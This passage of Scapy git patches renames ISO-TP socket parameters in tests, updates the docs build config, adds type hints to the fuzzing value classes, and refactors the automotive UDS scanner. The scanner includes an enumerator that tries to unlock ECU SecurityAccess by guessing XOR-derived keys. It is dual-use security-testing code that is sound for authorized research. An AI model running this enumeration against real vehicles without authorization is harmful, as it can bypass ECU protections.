test_isotpscan_none_random_ids(sniff_time=0.02): noise_listen_time=sniff_time * 6, sniff_time=sniff_time, verbose=True) - result = sorted(result, key=lambda x: x.src) + result = sorted(result, key=lambda x: x.tx_id) with new_can_socket0() as cans: for i in ids: # This helps to close ISOTPSoftSockets @@ -635,19 +635,19 @@ def test_isotpscan_none_random_ids(sniff_time=0.02): cans.send(CAN(identifier=0x100 + i, data=b'\x01\xaa')) for s in result: # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=s.dst, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.src, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) s.close() time.sleep(0) - cans.send(CAN(identifier=s.dst, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.src, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) [t.join(timeout=10) for t in threads] thread_noise.join(timeout=10) assert len(result) == len(ids) ids = sorted(ids) for i, s in zip(ids, result): - assert i == s.src - assert i + 0x100 == s.dst + assert i == s.tx_id + assert i + 0x100 == s.rx_id for s in result: del s @@ -679,7 +679,7 @@ def test_isotpscan_none_random_ids_padding(sniff_time=0.02): noise_listen_time=sniff_time * 6, sniff_time=sniff_time, verbose=True) - result = sorted(result, key=lambda x: x.src) + result = sorted(result, key=lambda x: x.tx_id) with new_can_socket0() as cans: for i in ids: # This helps to close ISOTPSoftSockets @@ -690,19 +690,19 @@ def test_isotpscan_none_random_ids_padding(sniff_time=0.02): cans.send(CAN(identifier=0x100 + i, data=b'\x01\xaa')) for s in result: # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=s.dst, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.src, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) s.close() - cans.send(CAN(identifier=s.dst, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.src, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) + cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) time.sleep(0) [t.join(timeout=10) for t in threads] thread_noise.join(timeout=10) assert len(result) == len(ids) ids = sorted(ids) for i, s in zip(ids, result): - assert i == s.src - assert i + 0x100 == s.dst + assert i == s.tx_id + assert i + 0x100 == s.rx_id if isinstance(s, ISOTPSoftSocket): assert s.impl.padding is True for s in result: diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index fad05112fdc..8a077a40e42 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -102,7 +102,7 @@ drain_bus(iface0) started = threading.Event() def isotpserver(): - with new_can_socket(iface0) as isocan, ISOTPSocket(isocan, sid=0x700, did=0x600) as s: + with new_can_socket(iface0) as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x600) as s: s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) @@ -119,6 +119,8 @@ std_out2, std_err2 = result.communicate() send_returncode = subprocess.call(['cansend', iface0, '600#01aa']) sniffer.join(timeout=10) +print(std_out1) +print(std_err1) assert 0 == send_returncode assert returncode1 == 0 assert returncode2 == 0 @@ -134,7 +136,7 @@ drain_bus(iface0) started = threading.Event() def isotpserver(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x700, did=0x601, extended_addr=0xaa, extended_rx_addr=0xbb) as s: + with new_can_socket0() as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb) as s: s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) @@ -165,7 +167,7 @@ drain_bus(iface0) started = threading.Event() def isotpserver(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x700, did=0x601, extended_addr=0xaa, extended_rx_addr=0xbb) as s: + with new_can_socket0() as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb) as s: s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) @@ -197,7 +199,7 @@ drain_bus(iface0) started = threading.Event() def isotpserver(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x700, did=0x601, extended_addr=0xaa, extended_rx_addr=0xbb) as s: + with new_can_socket0() as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb) as s: s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) @@ -218,8 +220,8 @@ sniffer.join(timeout=10) assert 0 == send_returncode assert returncode1 == 0 == returncode2 -expected_output = [b'sid=0x601', b'did=0x700', b'padding=False', b'extended_addr=0xbb', b'extended_rx_addr=0xaa'] - +expected_output = [b'tx_id=0x601', b'rx_id=0x700', b'padding=False', b'ext_address=0xbb', b'rx_ext_address=0xaa'] +print(std_out1) for out in expected_output: assert plain_str(out) in plain_str(std_out1 + std_out2) From 298939e9f719258f219565cf81c0f6a32d7db47f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 25 Dec 2021 13:02:18 +0100 Subject: [PATCH 0715/1632] Update readthedocs config --- .readthedocs.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.readthedocs.yml b/.readthedocs.yml index 64d61351d9a..ecf566c59b4 100644 --- a/.readthedocs.yml +++ b/.readthedocs.yml @@ -1,7 +1,6 @@ # Readthedocs config file. # See https://docs.readthedocs.io/en/stable/config-file/v2.html#supported-settings -# Copied from https://github.com/pycontribs/jira/blob/master/.readthedocs.yml version: 2 @@ -10,10 +9,11 @@ formats: - pdf build: - image: latest + os: ubuntu-20.04 + tools: + python: "3.9" python: - version: 3.7 install: - method: pip path: . From 3ee3cca082a3f7b2c450bcd96e21b8839877d90d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 31 Dec 2021 16:11:19 +0100 Subject: [PATCH 0716/1632] Minor cleanup and stabilization of UDS_Scanner / UDS_SA_XOR_Enumerator --- .../contrib/automotive/scanner/enumerator.py | 29 +++++------ scapy/contrib/automotive/uds_scan.py | 48 +++++++++++++------ 2 files changed, 48 insertions(+), 29 deletions(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index f0cc213f441..67b0fcb20a0 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -259,20 +259,7 @@ def execute(self, socket, state, **kwargs): "[i] Start execution of enumerator: %s", time.ctime(start_time)) for req in it: - try: - res = socket.sr1(req, timeout=timeout, verbose=False) - except (OSError, ValueError, Scapy_Exception) as e: - if not self._populate_retry(state, req): - log_interactive.critical( - "[-] Exception during retry. This is bad") - raise e - - if socket.closed: - if not self._populate_retry(state, req): - log_interactive.critical( - "[-] Socket closed during retry. This is bad") - log_interactive.critical("[-] Socket closed during scan.") - raise Scapy_Exception("Socket closed during scan") + res = self.sr1_with_retry_on_error(req, socket, state, timeout) self._store_result(state, req, res) @@ -294,6 +281,20 @@ def execute(self, socket, state, **kwargs): execute.__doc__ = _supported_kwargs_doc + def sr1_with_retry_on_error(self, req, socket, state, timeout): + # type: (Packet, _SocketUnion, EcuState, int) -> Packet + try: + res = socket.sr1(req, timeout=timeout, verbose=False) + if socket.closed: + log_interactive.critical("[-] Socket closed during scan.") + raise Scapy_Exception("Socket closed during scan") + except (OSError, ValueError, Scapy_Exception) as e: + if not self._populate_retry(state, req): + log_interactive.critical( + "[-] Exception during retry. This is bad") + raise e + return res + def _evaluate_response(self, state, # type: EcuState request, # type: Packet diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 5a7c0ee639c..5df060704f9 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -11,6 +11,7 @@ import time import itertools import copy +import inspect from collections import defaultdict from typing import Sequence @@ -596,7 +597,7 @@ def evaluate_security_access_response(res, seed, key): class UDS_SA_XOR_Enumerator(UDS_SAEnumerator, StateGenerator): _description = "XOR SecurityAccess supported" - _transition_function_args = dict() # type: Dict[_Edge, int] + _transition_function_args = dict() # type: Dict[_Edge, Dict[str, Any]] @staticmethod def get_key_pkt(seed, level=1): @@ -633,32 +634,48 @@ def key_function_short(s): else: return None - @staticmethod - def get_security_access(sock, level=1, seed_pkt=None): + def get_security_access(self, sock, level=1, seed_pkt=None): # type: (_SocketUnion, int, Optional[Packet]) -> bool log_interactive.info( "Try bootloader security access for level %d" % level) if seed_pkt is None: - seed_pkt = UDS_SAEnumerator.get_seed_pkt(sock, level) + seed_pkt = self.get_seed_pkt(sock, level) if not seed_pkt: return False if not any(seed_pkt.securitySeed): return False - key_pkt = UDS_SA_XOR_Enumerator.get_key_pkt(seed_pkt, level) + key_pkt = self.get_key_pkt(seed_pkt, level) if key_pkt is None: return False - res = sock.sr1(key_pkt, timeout=5, verbose=False) - return UDS_SA_XOR_Enumerator.evaluate_security_access_response( + last_seed_req = self._results[-1].req + last_state = self._results[-1].state + + try: + res = sock.sr1(key_pkt, timeout=5, verbose=False) + if sock.closed: + log_interactive.critical("[-] Socket closed during scan.") + raise Scapy_Exception("Socket closed during scan") + except (OSError, ValueError, Scapy_Exception) as e: + if not self._populate_retry(last_state, last_seed_req): + log_interactive.critical( + "[-] Exception during retry. This is bad") + raise e + + return self.evaluate_security_access_response( res, seed_pkt, key_pkt) - @staticmethod - def transition_function(sock, _, kwargs): + def transition_function(self, sock, _, kwargs): # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 - return UDS_SA_XOR_Enumerator.get_security_access( - sock, kwargs["sec_level"]) + if six.PY3: + spec = inspect.getfullargspec(self.get_security_access) + else: + spec = inspect.getargspec(self.get_security_access) + + func_kwargs = {k: kwargs[k] for k in spec.args if k in kwargs.keys()} + return self.get_security_access(sock, **func_kwargs) def get_new_edge(self, socket, config): # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 @@ -684,7 +701,8 @@ def get_new_edge(self, socket, config): if last_state == new_state: return None edge = (last_state, new_state) - self._transition_function_args[edge] = sec_lvl + self._transition_function_args[edge] = \ + {"level": sec_lvl, "desc": "SA=%d" % sec_lvl} return edge except AttributeError: pass @@ -693,9 +711,9 @@ def get_new_edge(self, socket, config): def get_transition_function(self, socket, edge): # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] - return self.transition_function, { - "sec_level": self._transition_function_args[edge], - "desc": "SA=%d" % self._transition_function_args[edge]}, None + return self.transition_function, \ + self._transition_function_args[edge], \ + None class UDS_RCEnumerator(UDS_Enumerator): From b686395c4d0f1c06f9044ef2fabeb18ad50b142c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 31 Dec 2021 16:21:23 +0100 Subject: [PATCH 0717/1632] fix mypy --- scapy/contrib/automotive/scanner/enumerator.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 67b0fcb20a0..f891322d8ba 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -282,7 +282,7 @@ def execute(self, socket, state, **kwargs): execute.__doc__ = _supported_kwargs_doc def sr1_with_retry_on_error(self, req, socket, state, timeout): - # type: (Packet, _SocketUnion, EcuState, int) -> Packet + # type: (Packet, _SocketUnion, EcuState, int) -> Optional[Packet] try: res = socket.sr1(req, timeout=timeout, verbose=False) if socket.closed: From 0e63733d0839159fc0d33e19e5ade218a066af71 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 20 Nov 2021 12:50:04 +0100 Subject: [PATCH 0718/1632] Type volatile.py --- .config/mypy/mypy_enabled.txt | 1 + scapy/asn1/asn1.py | 10 +- scapy/asn1fields.py | 10 +- scapy/base_classes.py | 2 - scapy/compat.py | 23 +- scapy/dadict.py | 2 - scapy/fields.py | 21 +- scapy/utils6.py | 2 +- scapy/volatile.py | 391 +++++++++++++++++++++++++--------- 9 files changed, 328 insertions(+), 134 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 5185f07a01a..0e12d3f9436 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -46,6 +46,7 @@ scapy/supersocket.py scapy/themes.py scapy/utils.py scapy/utils6.py +scapy/volatile.py # LAYERS scapy/layers/can.py diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 1fb95885c4c..34d587a11d7 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -70,7 +70,7 @@ def dst(self, dt): # type: ignore timezone.utc = UTC() # type: ignore -class RandASN1Object(RandField): +class RandASN1Object(RandField["ASN1_Object[Any]"]): def __init__(self, objlist=None): # type: (Optional[List[Type[ASN1_Object[Any]]]]) -> None if objlist: @@ -97,12 +97,12 @@ def _fix(self, n=0): z = GeneralizedTime()._fix() return o(z) elif issubclass(o, ASN1_STRING): - z = int(random.expovariate(0.05) + 1) - return o("".join(random.choice(self.chars) for _ in range(z))) + z1 = int(random.expovariate(0.05) + 1) + return o("".join(random.choice(self.chars) for _ in range(z1))) elif issubclass(o, ASN1_SEQUENCE) and (n < 10): - z = int(random.expovariate(0.08) + 1) + z2 = int(random.expovariate(0.08) + 1) return o([self.__class__(objlist=self.objlist)._fix(n + 1) - for _ in range(z)]) + for _ in range(z2)]) return ASN1_INTEGER(int(random.gauss(0, 1000))) diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index bbb311fcac9..314fb06989f 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -34,7 +34,7 @@ RandNum, RandOID, RandString, - VolatileValue, + RandField, ) from scapy.compat import raw from scapy.base_classes import BasePacket @@ -54,7 +54,6 @@ Type, TypeVar, Union, - _Generic_metaclass, cast, TYPE_CHECKING, ) @@ -79,7 +78,6 @@ class ASN1F_element(object): _A = TypeVar('_A') # ASN.1 object -@six.add_metaclass(_Generic_metaclass) class ASN1F_field(ASN1F_element, Generic[_I, _A]): holds_packets = 0 islist = 0 @@ -228,7 +226,7 @@ def __str__(self): return repr(self) def randval(self): - # type: () -> VolatileValue + # type: () -> RandField[Any] return RandInt() @@ -381,7 +379,7 @@ class ASN1F_IA5_STRING(ASN1F_STRING): class ASN1F_UTC_TIME(ASN1F_STRING): ASN1_tag = ASN1_Class_UNIVERSAL.UTC_TIME - def randval(self): + def randval(self): # type: ignore # type: () -> GeneralizedTime return GeneralizedTime() @@ -389,7 +387,7 @@ def randval(self): class ASN1F_GENERALIZED_TIME(ASN1F_STRING): ASN1_tag = ASN1_Class_UNIVERSAL.GENERALIZED_TIME - def randval(self): + def randval(self): # type: ignore # type: () -> GeneralizedTime return GeneralizedTime() diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 84e771b95a9..6ccc251aa83 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -27,7 +27,6 @@ import scapy from scapy.error import Scapy_Exception from scapy.consts import WINDOWS -import scapy.modules.six as six from scapy.modules.six.moves import range @@ -54,7 +53,6 @@ _T = TypeVar("_T") -@six.add_metaclass(_Generic_metaclass) class Gen(Generic[_T]): __slots__ = [] # type: List[str] diff --git a/scapy/compat.py b/scapy/compat.py index b91dfd6325b..35cee1e13a9 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -94,6 +94,16 @@ # Import or create fake types +# If your class uses a metaclass AND Generic, you'll need to +# extend this class in the metaclass to avoid conflicts... +# Of course we wouldn't need this on Python 3 :/ +class _Generic_metaclass(type): + if FAKE_TYPING: + def __getitem__(self, typ): + # type: (Any) -> Any + return self + + def _FakeType(name, cls=object): # type: (str, Optional[type]) -> Any class _FT(object): @@ -158,7 +168,6 @@ def cast(_type, obj): # type: ignore collections.defaultdict) Deque = _FakeType("Deque") # type: ignore Dict = _FakeType("Dict", dict) # type: ignore - Generic = _FakeType("Generic") IO = _FakeType("IO") # type: ignore Iterable = _FakeType("Iterable") # type: ignore Iterator = _FakeType("Iterator") # type: ignore @@ -167,7 +176,6 @@ def cast(_type, obj): # type: ignore NoReturn = _FakeType("NoReturn") # type: ignore Optional = _FakeType("Optional") Pattern = _FakeType("Pattern") # type: ignore - Sequence = _FakeType("Sequence") # type: ignore Sequence = _FakeType("Sequence", list) # type: ignore Set = _FakeType("Set", set) # type: ignore TextIO = _FakeType("TextIO") # type: ignore @@ -179,6 +187,10 @@ def cast(_type, obj): # type: ignore class Sized(object): # type: ignore pass + @six.add_metaclass(_Generic_metaclass) + class Generic(object): # type: ignore + pass + overload = lambda x: x @@ -220,13 +232,6 @@ class AddressFamily: AF_INET6 = socket.AF_INET6 -class _Generic_metaclass(type): - if FAKE_TYPING: - def __getitem__(self, typ): - # type: (Any) -> Any - return self - - ########### # Python3 # ########### diff --git a/scapy/dadict.py b/scapy/dadict.py index 9189adba102..3b860101ebf 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -22,7 +22,6 @@ TypeVar, Union, cast, - _Generic_metaclass, ) ############################### @@ -55,7 +54,6 @@ class DADict_Exception(Scapy_Exception): _V = TypeVar('_V') # Value type -@six.add_metaclass(_Generic_metaclass) class DADict(Generic[_K, _V]): """ Direct Access Dictionary diff --git a/scapy/fields.py b/scapy/fields.py index 9bcf94393db..70a1a4d9d54 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -280,7 +280,7 @@ def copy(self): return copy.copy(self) def randval(self): - # type: () -> VolatileValue + # type: () -> VolatileValue[Any] """Return a volatile object whose value is both random and suitable for this field""" # noqa: E501 fmtt = self.fmt[-1] if fmtt in "BbHhIiQq": @@ -295,7 +295,11 @@ def randval(self): value = int(self.fmt[1:-1]) return RandBin(value) else: - warning("no random class for [%s] (fmt=%s).", self.name, self.fmt) + raise ValueError( + "no random class for [%s] (fmt=%s)." % ( + self.name, self.fmt + ) + ) class _FieldContainer(object): @@ -1426,7 +1430,7 @@ def getfield(self, return remain, i def randval(self): - # type: () -> K + # type: () -> Packet from scapy.packet import fuzz return fuzz(self.cls()) # type: ignore @@ -1708,10 +1712,9 @@ def addfield(self, pkt, s, val): def randval(self): # type: () -> RandBin try: - len_pkt = self.length_from(None) # type: ignore + return RandBin(self.length_from(None)) # type: ignore except Exception: - len_pkt = RandNum(0, 200) - return RandBin(len_pkt) + return RandBin(RandNum(0, 200)) class StrFixedLenEnumField(StrFixedLenField): @@ -2623,7 +2626,7 @@ class ByteEnumKeysField(ByteEnumField): def randval(self): # type: () -> RandEnumKeys - return RandEnumKeys(self.i2s) + return RandEnumKeys(self.i2s or {}) class ShortEnumKeysField(ShortEnumField): @@ -2631,7 +2634,7 @@ class ShortEnumKeysField(ShortEnumField): def randval(self): # type: () -> RandEnumKeys - return RandEnumKeys(self.i2s) + return RandEnumKeys(self.i2s or {}) class IntEnumKeysField(IntEnumField): @@ -2639,7 +2642,7 @@ class IntEnumKeysField(IntEnumField): def randval(self): # type: () -> RandEnumKeys - return RandEnumKeys(self.i2s) + return RandEnumKeys(self.i2s or {}) # Little endian fixed length field diff --git a/scapy/utils6.py b/scapy/utils6.py index 0061375e4c9..4d7bbfc3dcd 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -422,7 +422,7 @@ def in6_getLocalUniquePrefix(): btod = struct.pack("!II", i, j) mac = RandMAC() # construct modified EUI-64 ID - eui64 = inet_pton(socket.AF_INET6, '::' + in6_mactoifaceid(mac))[8:] + eui64 = inet_pton(socket.AF_INET6, '::' + in6_mactoifaceid(str(mac)))[8:] import hashlib globalid = hashlib.sha1(btod + eui64).digest()[:5] return inet_ntop(socket.AF_INET6, b'\xfd' + globalid + b'\x00' * 10) diff --git a/scapy/volatile.py b/scapy/volatile.py index 5587c7ce9f3..37fb0b54fd7 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -21,7 +21,19 @@ from scapy.base_classes import Net from scapy.compat import bytes_encode, chb, plain_str from scapy.utils import corrupt_bits, corrupt_bytes -from scapy.modules.six.moves import range + +from scapy.compat import ( + List, + TypeVar, + Generic, + Set, + Union, + Any, + Dict, + Optional, + Tuple, + cast, +) #################### # Random numbers # @@ -35,6 +47,7 @@ class RandomEnumeration: number will be drawn in not less than the number of integers of the sequence""" # noqa: E501 def __init__(self, inf, sup, seed=None, forever=1, renewkeys=0): + # type: (int, int, Optional[int], int, int) -> None self.forever = forever self.renewkeys = renewkeys self.inf = inf @@ -55,9 +68,11 @@ def __init__(self, inf, sup, seed=None, forever=1, renewkeys=0): self.i = 0 def __iter__(self): + # type: () -> RandomEnumeration return self def next(self): + # type: () -> int while True: if self.turns == 0 or (self.i == 0 and self.renewkeys): self.cnt_key = self.rnd.randint(0, 2**self.n - 1) @@ -81,184 +96,244 @@ def next(self): __next__ = next -class VolatileValue(object): +_T = TypeVar('_T') + + +class VolatileValue(Generic[_T]): def __repr__(self): + # type: () -> str return "<%s>" % self.__class__.__name__ def _command_args(self): + # type: () -> str return '' def command(self): + # type: () -> str return "%s(%s)" % (self.__class__.__name__, self._command_args()) def __eq__(self, other): + # type: (Any) -> bool x = self._fix() y = other._fix() if isinstance(other, VolatileValue) else other if not isinstance(x, type(y)): return False - return x == y + return bool(x == y) def __ne__(self, other): + # type: (Any) -> bool # Python 2.7 compat return not self == other - __hash__ = None + __hash__ = None # type: ignore def __getattr__(self, attr): + # type: (str) -> Any if attr in ["__setstate__", "__getstate__"]: raise AttributeError(attr) return getattr(self._fix(), attr) def __str__(self): + # type: () -> str return str(self._fix()) def __bytes__(self): + # type: () -> bytes return bytes_encode(self._fix()) def __len__(self): - return len(self._fix()) + # type: () -> int + # Does not work for some types (int?) + return len(self._fix()) # type: ignore def copy(self): + # type: () -> Any return copy.copy(self) def _fix(self): - return None + # type: () -> _T + return cast(_T, None) -class RandField(VolatileValue): +class RandField(VolatileValue[_T], Generic[_T]): pass -class _RandNumeral(RandField): +_I = TypeVar("_I", int, float) + + +class _RandNumeral(RandField[_I]): """Implements integer management in RandField""" def __int__(self): + # type: () -> int return int(self._fix()) def __index__(self): + # type: () -> int return int(self) def __nonzero__(self): + # type: () -> bool return bool(self._fix()) __bool__ = __nonzero__ def __add__(self, other): + # type: (_I) -> _I return self._fix() + other def __radd__(self, other): + # type: (_I) -> _I return other + self._fix() def __sub__(self, other): + # type: (_I) -> _I return self._fix() - other def __rsub__(self, other): + # type: (_I) -> _I return other - self._fix() def __mul__(self, other): + # type: (_I) -> _I return self._fix() * other def __rmul__(self, other): + # type: (_I) -> _I return other * self._fix() def __floordiv__(self, other): + # type: (_I) -> float return self._fix() / other __div__ = __floordiv__ def __lt__(self, other): + # type: (_I) -> bool return self._fix() < other def __le__(self, other): + # type: (_I) -> bool return self._fix() <= other def __ge__(self, other): + # type: (_I) -> bool return self._fix() >= other def __gt__(self, other): + # type: (_I) -> bool return self._fix() > other + +class RandNum(_RandNumeral[int]): + """Instances evaluate to random integers in selected range""" + min = 0 + max = 0 + + def __init__(self, min, max): + # type: (int, int) -> None + self.min = min + self.max = max + + def _command_args(self): + # type: () -> str + if self.__class__.__name__ == 'RandNum': + return "min=%r, max=%r" % (self.min, self.max) + return super(RandNum, self)._command_args() + + def _fix(self): + # type: () -> int + return random.randrange(self.min, self.max + 1) + def __lshift__(self, other): + # type: (int) -> int return self._fix() << other def __rshift__(self, other): + # type: (int) -> int return self._fix() >> other def __and__(self, other): + # type: (int) -> int return self._fix() & other def __rand__(self, other): + # type: (int) -> int return other & self._fix() def __or__(self, other): + # type: (int) -> int return self._fix() | other def __ror__(self, other): + # type: (int) -> int return other | self._fix() -class RandNum(_RandNumeral): - """Instances evaluate to random integers in selected range""" - min = 0 - max = 0 - +class RandFloat(_RandNumeral[float]): def __init__(self, min, max): + # type: (int, int) -> None self.min = min self.max = max - def _command_args(self): - if self.__class__.__name__ == 'RandNum': - return "min=%r, max=%r" % (self.min, self.max) - return super(RandNum, self)._command_args() - - def _fix(self): - return random.randrange(self.min, self.max + 1) - - -class RandFloat(RandNum): def _fix(self): + # type: () -> float return random.uniform(self.min, self.max) -class RandBinFloat(RandNum): +class RandBinFloat(RandFloat): def _fix(self): - return struct.unpack("!f", bytes(RandBin(4)))[0] + # type: () -> float + return cast( + float, + struct.unpack("!f", bytes(RandBin(4)))[0] + ) -class RandNumGamma(_RandNumeral): +class RandNumGamma(RandNum): def __init__(self, alpha, beta): + # type: (int, int) -> None self.alpha = alpha self.beta = beta def _command_args(self): + # type: () -> str return "alpha=%r, beta=%r" % (self.alpha, self.beta) def _fix(self): + # type: () -> int return int(round(random.gammavariate(self.alpha, self.beta))) -class RandNumGauss(_RandNumeral): +class RandNumGauss(RandNum): def __init__(self, mu, sigma): + # type: (int, int) -> None self.mu = mu self.sigma = sigma def _command_args(self): + # type: () -> str return "mu=%r, sigma=%r" % (self.mu, self.sigma) def _fix(self): + # type: () -> int return int(round(random.gauss(self.mu, self.sigma))) -class RandNumExpo(_RandNumeral): +class RandNumExpo(RandNum): def __init__(self, lambd, base=0): + # type: (float, int) -> None self.lambd = lambd self.base = base def _command_args(self): + # type: () -> str ret = "lambd=%r" % self.lambd if self.base != 0: ret += ", base=%r" % self.base return ret def _fix(self): + # type: () -> int return self.base + int(round(random.expovariate(self.lambd))) @@ -266,97 +341,116 @@ class RandEnum(RandNum): """Instances evaluate to integer sampling without replacement from the given interval""" # noqa: E501 def __init__(self, min, max, seed=None): + # type: (int, int, Optional[int]) -> None self._seed = seed self.seq = RandomEnumeration(min, max, seed) super(RandEnum, self).__init__(min, max) def _command_args(self): + # type: () -> str ret = "min=%r, max=%r" % (self.min, self.max) if self._seed: ret += ", seed=%r" % self._seed return ret def _fix(self): + # type: () -> int return next(self.seq) class RandByte(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, 0, 2**8 - 1) class RandSByte(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, -2**7, 2**7 - 1) class RandShort(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, 0, 2**16 - 1) class RandSShort(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, -2**15, 2**15 - 1) class RandInt(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, 0, 2**32 - 1) class RandSInt(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, -2**31, 2**31 - 1) class RandLong(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, 0, 2**64 - 1) class RandSLong(RandNum): def __init__(self): + # type: () -> None RandNum.__init__(self, -2**63, 2**63 - 1) class RandEnumByte(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, 0, 2**8 - 1) class RandEnumSByte(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, -2**7, 2**7 - 1) class RandEnumShort(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, 0, 2**16 - 1) class RandEnumSShort(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, -2**15, 2**15 - 1) class RandEnumInt(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, 0, 2**32 - 1) class RandEnumSInt(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, -2**31, 2**31 - 1) class RandEnumLong(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, 0, 2**64 - 1) class RandEnumSLong(RandEnum): def __init__(self): + # type: () -> None RandEnum.__init__(self, -2**63, 2**63 - 1) @@ -364,10 +458,12 @@ class RandEnumKeys(RandEnum): """Picks a random value from dict keys list. """ def __init__(self, enum, seed=None): + # type: (Dict[Any, Any], Optional[int]) -> None self.enum = list(enum) RandEnum.__init__(self, 0, len(self.enum) - 1, seed) def _command_args(self): + # type: () -> str # Note: only outputs the list of keys, but values are irrelevant anyway ret = "enum=%r" % self.enum if self._seed: @@ -375,32 +471,55 @@ def _command_args(self): return ret def _fix(self): + # type: () -> Any return self.enum[next(self.seq)] -class RandChoice(RandField): +class RandChoice(RandField[Any]): def __init__(self, *args): + # type: (*Any) -> None if not args: raise TypeError("RandChoice needs at least one choice") self._choice = list(args) def _command_args(self): + # type: () -> str return ", ".join(self._choice) def _fix(self): + # type: () -> Any return random.choice(self._choice) -class RandString(RandField): +_S = TypeVar("_S", bytes, str) + + +class _RandString(RandField[_S], Generic[_S]): + def __str__(self): + # type: () -> str + return plain_str(self._fix()) + + def __bytes__(self): + # type: () -> bytes + return bytes_encode(self._fix()) + + def __mul__(self, n): + # type: (int) -> _S + return self._fix() * n + + +class RandString(_RandString[bytes]): _DEFAULT_CHARS = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" # noqa: E501 def __init__(self, size=None, chars=_DEFAULT_CHARS): + # type: (Optional[Union[int, RandNum]], bytes) -> None if size is None: size = RandNumExpo(0.01) self.size = size self.chars = chars def _command_args(self): + # type: () -> str ret = "" if isinstance(self.size, VolatileValue): if self.size.lambd != 0.01 or self.size.base != 0: @@ -413,27 +532,24 @@ def _command_args(self): return ret def _fix(self): + # type: () -> bytes s = b"" - for _ in range(self.size): + for _ in range(int(self.size)): rdm_chr = random.choice(self.chars) s += rdm_chr if isinstance(rdm_chr, str) else chb(rdm_chr) return s - def __str__(self): - return plain_str(self._fix()) - - def __bytes__(self): - return bytes_encode(self._fix()) - - def __mul__(self, 